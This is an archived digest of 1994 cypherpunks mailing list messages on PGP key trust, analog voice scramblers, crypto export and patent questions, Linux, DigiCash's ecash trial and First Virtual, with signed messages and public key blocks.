> Keysigner key widely distributed, and ask that everyone trust that key
> to sign other keys.

It seems strange that people would be expected to trust a key to sign other keys, just because somebody (even Derek, whom I have a measure of respect for) asked them to. I trust a key to be an introducer if and when I am sure that a signature by that key means that the signed key belongs to the identity (be it "real" or a 'nym) it claims to represent. Authentication via Kerbie may or may not indicate this. Such a signature would give some information that I might use to make decisions on whether or not to trust the new key, but it certainly would not be trusted if it was the only signature.

Happy Hunting, -Chris.
______________________________________________________________________________
Christian Douglas Odhner     | "The NSA can have my secret key when they pry
cdodhner at primenet.com     | it from my cold, dead, hands... But they shall
pgp 2.3 public key by finger | NEVER have the password it's encrypted with!"
cypherpunks WOw dCD Traskcom Team Stupid
Key fingerprint = 58 62 A2 84 FD 4F 56 38 82 69 6F 08 E4 F1 79 11
------------------------------------------------------------------------------

From cdodhner at news.primenet.com Fri Dec 2 22:20:17 1994
From: cdodhner at news.primenet.com (cdodhner at news.primenet.com)
Date: Fri, 2 Dec 94 22:20:17 PST
Subject: 6-hour Secure Mobile Voice
Message-ID: <199412030625.BAA02517@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

I'm sure most of you have seen some of the cheap (relatively speaking) 'phone scramblers' and such sold in local "spy shops" and catalogs. I know as well as most of you that these (almost always analog) scrambler systems even with their "10,000 code frequencies!" and such are totally insecure against an attacker with modern resources, but I was wondering if any of these techniques would be good enough to use for real-time applications where the transmitted data is only valuable for 6 hours or less. Such a system would be useful if you only need security 'right now' and didn't care who knew after a certain (short) timeframe. Comments, advice and product reviews are all welcome from anyone with knowledge or experience in the area.

Happy Hunting, -Chris.
______________________________________________________________________________
Christian Douglas Odhner     | "The NSA can have my secret key when they pry
cdodhner at primenet.com     | it from my cold, dead, hands... But they shall
pgp 2.3 public key by finger | NEVER have the password it's encrypted with!"
cypherpunks WOw dCD Traskcom Team Stupid
Key fingerprint = 58 62 A2 84 FD 4F 56 38 82 69 6F 08 E4 F1 79 11
- ------------------------------------------------------------------------------
- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLuAPJioZzwIn1bdtAQFjGAF/e+c8KHSfboM+JuM1GTTuQ76zzJykn5C8
xZTHrpw2/mHDKsDVVLnhb+rbFH9f7w1U
=sGdw
-----END PGP SIGNATURE-----

From moulton at netcom.com Fri Dec 2 22:37:04 1994
From: moulton at netcom.com (Fred C. Moulton)
Date: Fri, 2 Dec 94 22:37:04 PST
Subject: AA BBS case
Message-ID: <199412030636.WAA09724@netcom13.netcom.com>

A few months ago there were several posts about the AA BBS case. Here is the info about the sentencing.

According to an AP story, Robert and Carleen Thomas were sentenced December 2, 1994 to 37 and 30 months in prison respectively for "transmitting pornography via computer and selling obscene videotapes". The defendants will be ordered to surrender their computer equipment according to U.S. District Judge Julia Gibbons. The defendants will begin their sentences in about two months and will not be allowed to remain free during appeal.

The Thomases operated the members-only Amateur Action Bulletin Board System in California. They were tried and convicted in Tennessee.

From wcs at anchor.ho.att.com Fri Dec 2 22:39:38 1994
From: wcs at anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204)
Date: Fri, 2 Dec 94 22:39:38 PST
Subject: using us crypto sw outside usa
Message-ID: <9412022104.AA11526@anchor.ho.att.com>

> I was wondering what is the legal status for using rsaref outside usa.
> Is it legal or not?

There are three problems - getting a copy, patent, and copyright.

Getting a copy of RSAREF means that somebody has to export it, which the US government strongly disapproves of.
On the other hand, if you're not a US citizen, and not in the US, and your government doesn't have laws against possessing things that other governments don't want you to have, no problem.

Patent - the RSA algorithm patent doesn't apply outside the US, so no problem.

Copyright - Most governments do honor U.S. copyrights. Some of the early RSAREF versions said that you may not export it, so there may be copyright problems if you use them outside the US. Newer versions have a warning that the US government doesn't permit export, and recommends talking to a lawyer if this affects you, but doesn't say that you may not do so - so there isn't a problem with permission, and therefore not with copyright.

That's nice, because otherwise I would have had to pay somebody outside North America to write a clone. (I had offered anybody on the net outside the US/Canada $100 to do so, but nobody took it, and I now cancel that offer because RSA doesn't forbid overseas use and copies have apparently gotten distributed.)

> Also, what is the legal status of RC4 code posted to the net?

Uncertain. It was protected by trade secret (not giving anybody copies unless they sign a license contract), but somebody apparently violated their contract and disclosed it anyway. Some places have laws against using information released like that, some don't, some allow the originator of the information to sue. There's also the problem of verifying whether that *really* is RC4.

Bill Stewart

From pfinerty at seattleu.edu Fri Dec 2 23:12:58 1994
From: pfinerty at seattleu.edu (Patrick J. Finerty Jr.)
Date: Fri, 2 Dec 94 23:12:58 PST
Subject: PGP on a VAX
In-Reply-To: <199412030109.UAA07622@phobos.lib.iup.edu>
Message-ID:

6

pjf
--
biochem grad student
teach me to fish and i'll steal your pole
pfinerty at bach.seattleu.edu finerty at msscc.med.utah.edu
finger any acct.
for pgp key pfinerty at nyx10.cs.du.edu

On Fri, 2 Dec 1994, Mark Rogaski wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
>
> I was wondering what the status of getting PGP compiled on a VAX was.
> The academic machine here is a VAX 6540 running VMS 5.5-1.
> Of course I avoid it, but I want to spread the good word amongst
> the IUP student users. Any place I can get documentation?
>
>
> - -----
> Doc                                   "I used to think that my brain was the
> rogaski at phobos.lib.iup.edu         best part of my body ... but then I
> http://www.lib.iup.edu/~rogaski/      remembered who was telling me this."
> 100,000 lemmings can't be wrong!      - Emo Phillips
>
> finger fllevta at oak.grove.iup.edu for PGP Public Key
>
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
>
> iQCVAwUBLt/FJR0c4/pqJauBAQExfQP/Z1EhLyYw449tTTjYrNNlLRdLA9sA2V+o
> rpYUgKc0o8yGfEVkERhMH5F40IawXfXkcmVp9Zk+AV8Z7GP2YYpIT8pbFuGSYAYZ
> HuZXUmYgfmGkzM9uyxV82TyTjh9hQ4Hv7ijwWIPOeROV552WJZYzamJqeBfdi/80
> xR13UjkjZs4=
> =CA+0
> -----END PGP SIGNATURE-----
>

From die at pig.die.com Sat Dec 3 00:11:14 1994
From: die at pig.die.com (Dave Emery)
Date: Sat, 3 Dec 94 00:11:14 PST
Subject: 6-hour Secure Mobile Voice
In-Reply-To: <199412030625.BAA02517@bb.hks.net>
Message-ID: <9412030810.AA05653@pig.die.com>

Christian Odhner writes:
>
> I'm sure most of you have seen some of the cheap (relatively speaking)
> 'phone scramblers' and such sold in local "spy shops" and catalogs. I
> know as well as most of you that these (almost always analog) scrambler
> systems even with their "10,000 code frequencies!" and such are totally
> insecure against an attacker with modern resources, but I was wondering
> if any of these techniques would be good enough to use for real-time
> applications where the transmitted data is only valuable for 6 hours or
> less.

The simplest of these devices is the single band frequency inverter.
It operates by mixing incoming voice with a carrier (usually around the top of the voice band) in a double balanced mixer and sending the resulting spectrum down the wire. It is not secure at all against anyone with very simple and widely available equipment - at most it would take such a person a few seconds to find the carrier frequency. And as any ham will tell you, it gets pretty easy to understand inverted or off frequency speech with practice. Most of the really super cheap (under $50 or $100) scramblers are of this toy type.

A more complex variant of this is the multiband or split band inverter. This was allegedly used early in World War II for medium security communications. It operates by splitting the voice spectrum into several frequency subbands and swapping those subbands around according to a pattern determined by a key. Masking tones or noise may be added in some of the bands to make understanding harder. Scramblers of this fixed shuffle type can generally be broken easily with DSP techniques. They are not common as current day products.

A modern variant of the multiband shuffling scrambler has been used by the US government for low security communications until recently (as the KY-65 Parkhill system). This rolling code scrambler shuffles the voice subband components dynamically several times a second under control of a pseudo random sequence determined by a key and plays some of them forward and some backwards from digital memories. This system requires much cleverer real time DSP signal analysis software to break than the fixed shuffle of World War II stuff, but allegedly some amateurs were able to recover intelligible speech from it without knowing the key sequences. There are lots of commercial versions of this type of scrambler available all over the world - they run from the low hundreds of dollars to the low thousands.
Given an attack based on making a best guess as to specific phonemes and phoneme sequences from a particular speaker rather than trying to crack the pseudo-random shuffling sequence, speech from such a device could probably be rendered intelligible in seconds to minutes using modern high performance DSPs and fast workstation processors and very clever software, but of course the software to do this is not widely public and the results are probably highly variable and speaker and signal quality dependent. In general, the availability of high performance processors and better speech recognition algorithms makes this approach more and more possible in shorter and shorter amounts of time.

Cracking the pseudo random sequence used in rolling code scramblers is a more classic cryptologic problem and varies greatly in difficulty depending on the particular design. This might take seconds, minutes or many days depending on what generates the sequence and how much "plaintext" can be recovered by signal analysis. Obviously once cracked the speech can be recovered in real time using simple gear.

> Such a system would be useful if you only need security 'right
> now' and didn't care who knew after a certain (short) timeframe.
> Comments, advice and product reviews are all welcome from anyone with
> knowledge or experience in the area.
>

My advice would be to use one of the digital scrambling technologies. Lots of surplus US government DES equipped HT's are available if radio communications are your purpose...

(signature under construction)

From crawford at scruznet.com Sat Dec 3 01:04:57 1994
From: crawford at scruznet.com (Michael D. Crawford)
Date: Sat, 3 Dec 94 01:04:57 PST
Subject: Info about Linux
Message-ID: <199412030904.BAA12842@scruz.net>

Joe Block, jpb at gate.net, sez:

> I want to run linux on this beast and would like some suggestions from the
> list - which of the linux CDs do you recommend?

Hi, I've got Linux.
Linux comes in different "distributions" - collections of files that have been integrated into a coherent system. My distribution is sold by Yggdrasil, (408) 261-6630, (800) 261-6630, for $39.95. I like it because it comes with a single boot floppy, and will run off the CDROM once it boots, so you can check it out without even having a hard disk installed.

If you've got time, patience, a good, fast net connection and a whole lotta floppies, the slackware distribution (and a couple of others) are available via anonymous FTP from sunsite.unc.edu.

There are also several other distributions available on CDROM from various vendors. Check the ads in the Linux Journal (subs at ssc.com for subscription info, (206) 527-3385, or at one of the bookstores I mention further down).

If you know about computers, and are willing to put some time into mucking around fixing little petty problems, you can get a very nice system. Mine is a 33 MHz 386 (this is a little too slow for me, but works well), with 8MB of memory (sufficient, should have more), and a nice fast 2.1 GB Fast SCSI-2 Quantum Empire 2100S hard disk. I invested in the hard disk as I felt it would be a lasting value in future computers. I'm skimping on ISA bus cards for the PC as I want to get a PCI bus machine, probably a 100MHz 486, in a few months.

You will be able to install Linux, the compiler, basic utilities, and the kernel sources with the disk space you have. You'll want to get more hard disk. I would recommend installing Linux a couple of times, just to see how it goes, before committing to a permanent installation. If you can't get more disk space, you can leave the Yggdrasil CDROM in your drive all the time and run the programs off the CDROM. Slower, but it works OK.

I highly recommend the Linux Bible, from Yggdrasil, whatever distribution you get. Read the "How To's" on the various hardware options _before_ purchasing any new hardware.
There are many supported peripherals, but I understand many of them work only marginally. For example, the UART chips generally used in PC serial ports are quite inadequate for driving an internet connection, as your machine will spend all its time servicing one-interrupt-per-character interrupts, but a serial card with a 16 character buffer that works just fine is available quite cheaply. You can FTP the bible from ftp.yggdrasil.com, but you'll want the hardcopy as it is over 1000 pages. The cover price is less than the cost of the toner cartridge you'll burn printing it.

The How To's, the Linux MetaFAQ and lots of other info are on rtfm.mit.edu and sunsite.unc.edu.

I've used lots of Unix systems, from System V on a 286, to Sun workstations, Vaxes, and even a Cray running Unicos, and I can say that Linux is equal to or better than any of them as far as what the OS can do, in some respects much much better. (I removed SCO ODT from my hard disk to install Linux. I might reinstall it on a second drive just to test my programs). There are still lots of glitches, but you have the source code, and access to comp.os.linux.help, where everyone else has the source code too - it beats the Hell out of Sun's technical support, IMHO. With about two thousand dollars more hardware, I would have a machine I would enjoy as much as a fifteen thousand dollar Sun, with the source code to boot ;-).

One thing I highly recommend: if you or anyone you know is planning on setting up a full-time Internet connection, use a Linux box as a router, running PPP or SLIP out a modem, and ethernet on your LAN. Even a slow 386 has enough performance to service a SLIP connection at 28 kbaud, and since you have the source code to the kernel and all the internet server software, you can implement a firewall any way you like.
I'm contemplating preparing my own distribution, which would be a very stripped-down Linux kernel and OS utility set, on a small number of bootable CDROMs, to allow one to install a firewall router on a small hard disk. Don't hold your breath waiting for this though.

There is a security enhancement I mean to try once I've set up my own full-time router (watch for http://crawford.sc.scruznet.com, in about two weeks, maybe a month). I want to remove the ability to set the setuid bit from the kernel. Trying to set the setuid bit on a file will abort the process. Of course you can't install system software if this is done - but I could boot off a different kernel to do maintenance. This would prevent the problem of a hacker breaking in and dropping a program in my path that the hacker intends me to accidentally execute as root. There would be ways to set the bit (writing into the raw disk special file) but it would require more effort to accomplish.

Crypto enthusiasts in the US and Canada can get Matt Blaze's CFS - I just got the sources, and haven't tried them out yet, but I understand there is already a Linux port.

Now here's a puzzler for you. The People's Republic of China is working very hard to modernize, but still lacks capital for much hardware investment, so you see banks using 386 boxes to run an entire bank, if the bank uses a computer at all. A couple of years ago I heard that the PRC signed a deal with some big Unix vendor to supply the nation with computers and software, for many millions of dollars. Why don't they use Linux? The PRC is certainly not lacking for educated people who could do all the development they need.

You can get Linux books and CDROM's from the Computer Literacy bookstore on North First Street in San Jose, and Powell's technical books in Portland Oregon. Powell's does mail order, and has a Web page which allows you to search their inventory for books. They've got lots of crypto books too, 2600 Magazine and lots of engineering books.
I think the URL is http:technical.powells.portland.or.us.

Development versions of Linux are available for Macintoshes and MIPS machines. If I were to use a Linux Laptop, I would put it on a Macintosh Powerbook.

Regards,

Michael D. Crawford
crawford at scruznet.com <- Please note change of address.
crawford at maxwell.ucsc.edu <- Finger me here for PGP Public Key.

From usura at xs4all.nl Sat Dec 3 01:39:05 1994
From: usura at xs4all.nl (usura at xs4all.nl)
Date: Sat, 3 Dec 94 01:39:05 PST
Subject: Kudos
Message-ID: <199412030943.EAA04190@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

Thanks and congratulations to Todd for a job well done with the CP signing service and Raph for his excellent work with premail.

An appreciative lurker/learner

- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLuA9wioZzwIn1bdtAQFXnwGAitqcooxfEeABifXLhmxmRAQKlM90Gm6K
Y2vmZi3kjSYWpDMYQNkID+HXYTeps30Q
=oN3X
-----END PGP SIGNATURE-----

From bigmac at digicash.com Sat Dec 3 02:01:47 1994
From: bigmac at digicash.com (Marcel van der Peijl)
Date: Sat, 3 Dec 94 02:01:47 PST
Subject: ecash trial issues explained
Message-ID: <199412031001.LAA14509@digicash.com>

(This message is not an official DigiCash message but represents my personal opinions)

Here are some answers to issues recently discussed on the cypherpunks list. I do not read this list as that takes too much time, I only read what people that do read forward from the list to me.

Stefan Brands is not excluded in any way from the trial. His request was never received at DigiCash. Several others in the CWI crypto group (all that applied) did receive their accounts. There is no 'political boycott'.

The ecash software allows for multiple payment protocols to co-exist.
Besides the currently implemented protocol and the Stefan Brands system there are more possible systems. We are not fixed in any way to the current protocol. Besides the patent issues, it is not clear which protocol is better.

Last time I checked (a week ago, I am currently on the road) there were well over 500 or 600 active ecash accounts. But there are another 1000 accounts waiting, and new requests coming in between 10 and 100 per day. As the mail that was sent out explains, the trial is rolled out in phases. The result is that the software is more 'robust' before large quantities of users run into the same problem, in the sense that it works on any OS in any configuration with any network hookup, no matter how 'bad'. (We are not in the business of being a 'network helpdesk'.)

Potential ecash vendors have had priorities in being assigned ecash accounts. But they are also 'harassed' for actually doing what they promise to do.

Because we can not support a 24 hour staff and we want to keep response time low, people in time zones close to ours (GMT+1) have been issued accounts first.

At the moment we are confident we can scale up the trial. I promise you it will not be several more months before everyone can join the trial.

People that run into ecash problems are almost always helped or replied to the same day, and often within the hour. However, some people send their problems to the wrong address, such as the generic ecash info address or the feedback address, which may result in not getting an answer for several days. If mails go to ecash-bugs at digicash.com, the developers involved immediately see the mail and help out, provided they are technical mails and have sufficient information to actually be able to give help. As you can imagine, problems described as 'it does not work for me' without any extra information take a few mails back and forth, and tedious searching in log files, before the actual problem is clear.
You can understand the anonymity of the system does not make that easier.

People that compare FV or other systems and ecash are really comparing apples and pears. From a business view they may look the same, but how they operate is totally different. Ecash is the only system that allows for full anonymity on the buyers side using public key technology. We strongly believe it should not be possible for anyone to see all individual transactions a person makes.

The business model used is also different. We do not charge users or shops a fee to use the ecash system, and provide the ecash software (both client and shop) for free, and give support for free. Unfortunately this does mean we are not getting large sums of money to spend on slick marketing schemes.

Just a final remark before totally boring you to death: Some of the people that post unfriendly messages on mailing lists, like Stefan Brands, do so before actually mailing to us. Please give us a fair chance!

Marcel van der Peijl
Ecash technical project leader
DigiCash bv
http://www.digicash.com/

From jya at pipeline.com Sat Dec 3 06:59:30 1994
From: jya at pipeline.com (jya at pipeline.com)
Date: Sat, 3 Dec 94 06:59:30 PST
Subject: Info about Linux
Message-ID: <199412031504.KAA06464@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

Responding to msg by crawford at scruznet.com (Michael D. Crawford) on Sat, 3 Dec 1:4 AM

Thanks for this Linux info.

FWIW, PC Mag's John Dvorak plugs Linux and Yggdrasil in the December 20 issue. He says, "there's no excuse not to have Linux as a primary or alternative operating system ... highly recommended, bargain of the year."

- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLuCI6SoZzwIn1bdtAQGzsAF/bDaj0dXzETyOkhL+qN+EfJYumWR6Oocj
m4drVaoXQBnuEmQMM4UfOwcTt6tqsr/a
=saEy
-----END PGP SIGNATURE-----

From snyderra at dunx1.ocs.drexel.edu Sat Dec 3 07:37:25 1994
From: snyderra at dunx1.ocs.drexel.edu (Bob Snyder)
Date: Sat, 3 Dec 94 07:37:25 PST
Subject: How do *I* use PGP?
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

At 5:30 PM 12/1/94, TheElusiveMatthew wrote:
>It has been my belief that there isn't an effective way for me to use PGP,
>but with all the hubbub, I thought it might be worthwhile to verify this.
>
>My internet access is through a personal account provided by my employer.
>It is on a machine used exclusively by employees of the University of
>Illinois (no student accounts).

What kind of machine is it? How do you read mail? A PC mail reader?

>My primary access to this account is through my IBM xt (dos 3.3) at work.
>This machine is occasionally used by others and is outside of my control.
>I also use many of the public access Win/Mac machines on campus.
>I have no pc of my very own.

The XT might be difficult because of memory issues, but there are versions of PGP for UNIX, Mac, and PC, sp.....

Bob

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBLuCM/OS0CjsjWS0VAQGUCAQAngYMNWJsk0ZpZfKS54JBcyND9HswtoIt
2U9a9pzDkSFxUyUYNvBRPzvaabjRtG6wBhaS/t7in7rxFCQ9TEPYha4pu6SXRXM6
XclYnCw/9zHJRCtRHMHAT0ijYvQvqPirDcQS7TzhRUfEbXAI1A6VN2X3OVGIyU14
pwZb72SgNh4=
=j2U3
-----END PGP SIGNATURE-----

--
Bob Snyder N2KGO                     MIME, PGP, RIPEM mail accepted
snyderra at post.drexel.edu        PGP & RIPEM keys on key servers
When cryptography is outlawed, bayl bhgynjf jvyy unir cevinpl.

From eric at remailer.net Sat Dec 3 08:58:16 1994
From: eric at remailer.net (Eric Hughes)
Date: Sat, 3 Dec 94 08:58:16 PST
Subject: First Virtual?
In-Reply-To: <9412022231.AA06560@ch1d157nwk>
Message-ID: <199412031756.JAA17333@largo.remailer.net>

   How can you really compare the proposed DigiCash systems versus FirstVirtual? One is a 'toy' system for moving credit card numbers around without actually broadcasting them in the clear, the other is a cryptographically secure digital cash type system.

Digicash and First Virtual and Net Bank are all payment systems. The primary benefit is moving money. _All_ other benefits are secondary, including privacy and security.

As far as actually being a payment system, it's Digicash's trial which is the toy system. It can't move money. First Virtual, no matter what its flaws, can. Not particularly securely, not quickly, but money will move. Just because FV is a bad payments system doesn't mean it's not a payments system.

There's no question at all that Digicash's technical means are superior to First Virtual's. But technical means alone do not make a business and Digicash at this moment doesn't have a business but rather only a possible opportunity for one.

First Virtual has all sorts of problems. Its security sucks. It will have a higher fraud rate than other credit card uses. Merchants won't particularly like it because of this and the delay in payments. Users won't like it because the interface sucks. It's not fully fungible money, because you can't use it for arbitrary commerce.

Fine. Because of all these concerns, FV won't be suitable for many purposes, but it will be for some. What FV's commercial advantage will be is that they'll have a pre-existing user base on hand when the improved system comes. This is a not insignificant advantage, since it's much easier to deal with someone you've already been dealing with than with somebody new.
Eric

From pfarrell at netcom.com Sat Dec 3 09:01:43 1994
From: pfarrell at netcom.com (pfarrell at netcom.com)
Date: Sat, 3 Dec 94 09:01:43 PST
Subject: Cypherpunks@hks.net service
Message-ID: <199412031706.MAA07494@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

>> It will sign any message sent to cypherpunks at hks.net with its
>> (currently 384 bit) key and forward the signed message to
>> cypherpunks at toad.com.
>
> No offense, but what's the point? What's next, automated key-signing

The point is that if Eric insists on arbitrary rules that threaten the list, some bright c'punk will "write code" to circumvent the asinine rule. Use technology to solve problems...

But that is why a number of folks have posted that the rule is at best ill conceived. Eric simply hasn't listened. Thus the recent mini-flame war that again lowers the signal to noise ratio on the list.

He wants the world to use encryption. So do I. But the tools are not there for even the net-heads on this list. There is nothing close to tools suitable for Joe Sixpack. Changing the rules on c'punks won't change that.

Pat

Pat Farrell     Grad Student                    pfarrell at cs.gmu.edu
Department of Computer Science    George Mason University, Fairfax, VA
Public key available via finger   #include

- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLuCljioZzwIn1bdtAQEjewF+N4i7B7kdkeGyi+ggI4PjQAbQ6Uyl+45i
mqbyWWGDptWY/nsZOmLmBnX8T64U1JuH
=e2n2
-----END PGP SIGNATURE-----

From eric at remailer.net Sat Dec 3 09:02:37 1994
From: eric at remailer.net (Eric Hughes)
Date: Sat, 3 Dec 94 09:02:37 PST
Subject: signature checking at the server
In-Reply-To: <199412022104.NAA17526@jobe.shell.portal.com>
Message-ID: <199412031801.KAA17339@largo.remailer.net>

Unbelievably, I don't think this old canard has come up yet in this discussion.

   I've always perceived PGP(Tm) as something I would use when I really had something sensitive to send a friend,

If you encrypt only some messages and not others, every use of encryption will indicate that something significant is going on, which is a first class message of its own. Only if all messages to particular correspondents are encrypted do you reveal no information about importance.

Encryption still has benefit here, but the argument that it should only be used when important has no merit.

Eric

From eric at remailer.net Sat Dec 3 09:14:35 1994
From: eric at remailer.net (Eric Hughes)
Date: Sat, 3 Dec 94 09:14:35 PST
Subject: MIT Keysigner CA
In-Reply-To:
Message-ID: <199412031813.KAA17366@largo.remailer.net>

   From: Christian Odhner

   I trust a key to be an introducer if and when I am sure that a signature by that key means that the signed key belongs to the identity (be it "real" or a 'nym) it claims to represent.

There is a qualitative difference between a real identity and a pseudonym identity. A real identity has a body attached to it and a pseudonym identity does not. The phrase "belongs to" cannot be used in the same sense for both of these, and the failure to discriminate between them is a fallacy.

With a pseudonym, the identity _is_ the key. All you need to do is to ensure that the pattern of bits in the key does not change during distribution.
As far as an MIT autosigner, the signature will simply represent a reduction to the trustability of the MIT account assignment procedure. This is not a reduction to bodily identity and should not be construed as such. In fact, a MIT autosigner is exactly what I was talking about when I advocated that communication provider sign keys. (Good work as usual, Derek.) The signature here represents an attestation that a given key (that is, a given identity) can be reached through a particular mailbox. Almost all email is effectively pseudonymous already, even if there is a shadow of the procession of bodies behind the email. It makes good sense to speak of mailing to a key; this is the logical operation of creating an informational space accessible only to the holder of a secret. A mailbox is merely a physical and technical means for reaching that space. Eric From eric at remailer.net Sat Dec 3 09:35:12 1994 From: eric at remailer.net (Eric Hughes) Date: Sat, 3 Dec 94 09:35:12 PST Subject: Disclaimer within signed body? In-Reply-To: <199412022016.PAA16908@bb.hks.net> Message-ID: <199412031833.KAA17387@largo.remailer.net> Todd's autosigner raises some good issues about what signatures can actually represent. Todd's service takes an incoming message, attaches a note about technical means and also a signature. As Todd points out, this signature represents the fact that a message destined for the cypherpunks list passed through his server. But Todd also wants the signature to attest to the disclaimer attached to the mail. The signature, therefore must be affected by both segments of text, that is, the disclaimer must be inside the signature. There is also, however a desideratum that the original message be preserved to the greatest degree possible. Since two text segments must go inside the sig block, there must be a packaging syntax to represent a two part message composed of the original message and the disclaimer. 
There is already a syntax which accomplishes this for email--MIME. I'm not going to get the syntax of this example right.

-----------------------------------------------------------------------------
--- Begin signed message ---
::
Content-Type: multipart/mixed
Content-Length: [...]
Boundary: ===
Content-Type: text/ascii
===
===
Content-Type: text/ascii
disclaimer
===
===
--- Begin signature ---
a;sdfj;alsdjf;a lsjas;ldkfj;asjdf;askjdf;laskjdfdf
a;sdfj;asdjf;asfj;alsjdf;aljdf;alsdjf;alsjdf;asjdf
--- End signed message ---
-----------------------------------------------------------------------------

Now as far as aesthetics, this has got a lot of screenjunk in it. It does, however, represent exactly what is going on in a way that the right kind of MIME capable reader can make exact use of. I'm not advocating this. I do think, though, that a minimal solution to all the criteria at once looks a lot like this. Eric From jya at pipeline.com Sat Dec 3 09:42:01 1994 From: jya at pipeline.com (jya at pipeline.com) Date: Sat, 3 Dec 94 09:42:01 PST Subject: First Virtual? Message-ID: <199412031747.MAA07819@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- Responding to msg by eric at remailer.net (Eric Hughes) on Sat, 3 Dec 9:56 AM Not a big deal, but for Unix-fans who deign toy-PCs, PC Mag of December 20 has two brief pieces on First Virtual, indicating that its mass-market greenbucks are abuying hard pitch Xmas-adcopy. One dim-spots other "digital buck" services SpyGlass and Open Market, cash-poor things. See pp. 32 and 61. [First time use of the sig below, be gentle, still learning how to get PGP-signed message in this mailer.] 
- -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQCNAy6rxQQAAAEEANW657bMcILCSaEYHV46DQWojtHDv6UQ2qGz+6wG5g5Q7KMz QkQjM+fYNScW4fDUYH02wLG5x/E5hYwSaYal0k0b6G9m921QKqhVYj2+QzfiMqce N45t4GjSNBdwmNywZEyz5RKXbAWm78DmAt9Ro3M8AGvG1XrsU4Sb9hQ07hCVAAUR tB1Kb2huIFlvdW5nIDxqeWFAcGlwZWxpbmUuY29tPg== =F0Xj - -----END PGP PUBLIC KEY BLOCK----- - ------------------- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuCvBioZzwIn1bdtAQGKqgGAnUpbIyAQ4aE1d0iHHZQLpj8yn2jRHruS oK8hqFI8AI07p0pMGl7kcgm1OefM/zOy =aTQt -----END PGP SIGNATURE----- From kafka at desert.xs4all.nl Sat Dec 3 09:58:24 1994 From: kafka at desert.xs4all.nl (John van Goorkom) Date: Sat, 3 Dec 94 09:58:24 PST Subject: Voice over data In-Reply-To: Message-ID: <199412031759.AA02827@xs1.xs4all.nl> -----BEGIN PGP SIGNED MESSAGE----- rishab at dxm.ernet.in once said: RI> Eric Hughes wrote: RI> > the great voice-over-data protocols and products introduced by RI> > Intel, Rockwell, ZyXEL and others at Comdex which will make RI> > Voice-PGP so much easier RI> > RI> > As I understand these voice-over-data products, the voice goes over RI> > analog, added to the modem signal. The modem signal is interpreted, RI> > and then reconstructed and subtracted from the incoming signal, RI> > leaving voice. Very clever, but insufficient for secure phones. RI> RI> I don't think that's how they do it. As far as I know, most methods RI> multiplex RI> digitized audio with the data. One system used by some people in India RI> provides RI> a dynamic combination of fax, (digitized) voice and data, depending on the RI> throughput - eg vox/9.6 data if 14.4kbps, fax as well if 19.2, etc. RI> RI> While Intel and others are proposing standards, ZyXEL does it with software RI> along with a voice card or possibly RJ11 input. 
A friend of mine saw a demo RI> of it at Comdex, on an old 1496E (16.8 kbps zyxel to zyxel). The new v.34 RI> does RI> 28.8k - lots of room for clear digitized voice and high speed data. RI> RI> This is exactly why I thought it would make secure voice easier, if not RI> secure RI> phones (who wants to lug a modem and PC around as a 'handset'?). RI> RI> I'll be testing some Onetics Rad VFAST modems this week, which apparently do RI> digitized voice over v.34 as well. > >You wouldn't have the directory name as well, by any chance?, David. The IGP files are available at a32.cc.umist.ac.uk in the /network/ftp/igp directory. There are two versions of the program available: 1. igp8_10x.zip for 8 bit sound (on 8 or 16 bit sound cards) 2. ig16_10x.zip for 16 bit sound cards. Better quality, but more data to transfer so a bit slower. the latest source code is also available as igps_10x.zip. Paul Archard (IGP UMIST Distribution acting Project Manager) _______________________________________________________________________________ kafka at desert.xs4all.nl Cryptoanarchy, MDMA, Tekkkno, SL-1200 Kafka's home page _______________________________________________________________________________ -----BEGIN PGP SIGNATURE----- Version: 2.6 iQBVAwUBLt7CDZRymF15lPcFAQFSsgIAhoPpWCNjRbmqu9hxrrzSKbf7uMqeJxAd /B24tG5b5Cn3a478sg3OrMUjgF9CbsS7FZZEtKL8beOcsxS/5oaoEw== =jMOd -----END PGP SIGNATURE----- From desert!desert!kafka at consolat.xs4all.nl Sat Dec 3 09:58:47 1994 From: desert!desert!kafka at consolat.xs4all.nl (desert!desert!kafka at consolat.xs4all.nl) Date: Sat, 3 Dec 94 09:58:47 PST Subject: my key Message-ID: <199412031803.NAA07972@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6whatever mQCNAiz8ExIAAAEEAMCOBYWuMLd+bWGzyLIO2Nr+jQOydZ3azOVkRtsz0sgaRmep UoMcAdpfAdDp3QzyQ5yzYfw5xqcFqiTJDaSNd0vncAHpsA2gQl727B1blg4qVlDY 5mNlJUG6CVrAq11eqI0pYIfw/uNlysvt/qKIEh4lK4ShLhBaab5mNggyLQMFAAUR 
